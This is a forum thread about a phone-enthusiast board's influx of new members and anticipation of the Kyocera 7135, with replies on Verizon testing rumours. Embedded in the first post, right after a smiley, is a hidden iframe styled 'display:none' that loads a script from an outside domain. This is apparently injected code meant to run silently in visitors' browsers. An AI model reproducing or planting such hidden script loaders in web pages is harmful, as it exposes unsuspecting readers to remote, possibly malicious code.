+ Reply to Thread

Almost 500 new members since 9/1/02!

I knew that new members were joining left and right... but I was pretty surprised today when I counted it up and almost 500 new members have joined since 9/1/02! And judging by all of the names I didn't recognize it looks like they are mostly new members and not re-registrations. Pretty cool, huh? My guess is that it's partly because everybody is getting psyched about the 7135 release date getting close, and while searching the web for info they found their way here.
    Welcome to all of the new members! :drink1<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

I'm one of the newbies and have been certifiable waiting for the 7135. So glad to have found the site and realized I wasn't the only one!

Originally posted by CharlieS
    I'm one of the newbies and have been certifiable waiting for the 7135. So glad to have found the site and realized I wasn't the only one!
    Welcome to the board dude! :drink1

Administrator
    also this contest has generated a lot of hype... there were a lot of "viewers" on the board well before we announced the contest.. but it doesnt matter.. im glad to see folks signing up to be a member. :drink3

New Members

I just happened to be looking for an upgrade to my Startac, whick I've had since it frst came out, and I ran into this very cool site. Plus I fell in love with the 7135 and CAN NOT WAIT for it to be available. Looks perfect. I am, however, a little worried about the recent rumors regading the phone failing Verizon tests. Looking for more information on that topic...anyone?

I've recently seen a few mentions of Verizon peeps actually reading this stuff, if so, any of you care to chime in on any of these topics?

audio_*****

Administrator
    there have been phones to fail verizon and sprints tests many times in the past, so dont think this is new...

Originally posted by marctronixx
    there have been phones to fail verizon and sprints tests many times in the past, so dont think this is new...
    True... I'm just surprised that Kyocera doesn't have the process completely down by now.